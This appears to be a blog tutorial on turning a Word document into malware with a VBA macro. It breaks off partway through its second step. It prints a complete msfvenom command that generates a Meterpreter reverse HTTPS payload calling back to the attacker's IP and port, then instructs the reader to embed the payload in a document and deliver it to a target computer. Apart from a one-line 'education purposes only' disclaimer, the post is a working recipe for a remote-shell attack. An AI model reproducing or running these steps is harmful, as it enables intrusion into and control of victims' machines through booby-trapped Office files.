Posts

Showing posts from April, 2021

How to Create Malware Docs using Macro

Image
What is Macro? According to Microsoft , a macro is a series of commands and instructions that you group together as a single command to accomplish a task automatically.  You can automate frequently used tasks by creating and running macros in Word and Excel.  For this method, we will be using  1. Kali Linux 2. Metasploit 3. Word ***Note: This is for education purposes only Steps 1.      First, we must first create a payload. MSFvenom will be used to build the payload. For this demonstration, we used the reverse http payload. We will use the command  msfvenom -p windows/meterpreter/reverse_https lhost=192.168.1.106 lport=1234 -f vba .   For lhost,we stated the Attacker Machine's local IP address, which is Kali Linux. For lhost,we must also include a Local port on which the session will be created.  2.     Then, w e copy the vba payload content after generating the payload with the correct configuration for the vba payload and then pass on to the target computer as you can see in Ima